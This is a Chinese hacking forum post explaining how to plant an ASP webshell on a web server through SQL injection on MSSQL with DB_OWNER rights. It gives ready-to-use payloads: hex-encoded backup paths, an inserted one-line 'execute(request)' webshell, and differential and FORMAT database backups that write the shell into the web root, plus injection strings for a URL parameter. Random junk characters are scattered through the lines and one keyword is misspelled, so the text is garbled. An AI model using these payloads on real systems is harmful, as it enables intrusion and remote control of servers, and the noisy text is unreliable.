DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

* c8 x" Y3 N" S7 ?# m5 r) ]) t减少备份文件大小，得到可执行的webshell成功率提高不少
# a. q4 S+ X( A) u+ Y一利用差异备份
. Z+ K5 V8 k; T  T加一个参数WITH DIFFERENTIAL

+ @5 d; J, |% @6 E2 B1
2
3
$ B+ U8 u* f, [4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
. n2 N% ]0 m/ [) C0 c( Ninsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
( Z; R1 x' h3 Q7 ]- M4 {  M
二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
# w0 A5 I6 A" A5 X$ f% u% X
6 v+ O" i) q2 @9 f6 J0 d- s) `# `1
2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
* Q6 ]0 m2 Q9 H) M' t8 Xcreate table [dbo].[xiaolu] ([cmd] [image]);
  l" r% b  Q8 N! M8 P! }& Qinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
3 O" g, `6 m& W% U. @declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
9 u& K% H6 _8 Z
总的来说就是那么简单几句,下面以备份数据库model为例子
9 R, f: }! c5 E* d) f$ x, {1

$ o9 _6 h' b4 e1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
" J; n% S1 K2 \* L9 m
2
8 R. n7 t) L6 \# n* g; p7 h; e2 A2 }8 ?
% W5 {. T. [; |3 ~1
. S9 Z& f3 m9 c# p id=1;backup database model to disk='你的路径‘ with differential,format;--
- K% Y* h& T% _4 V& [2 w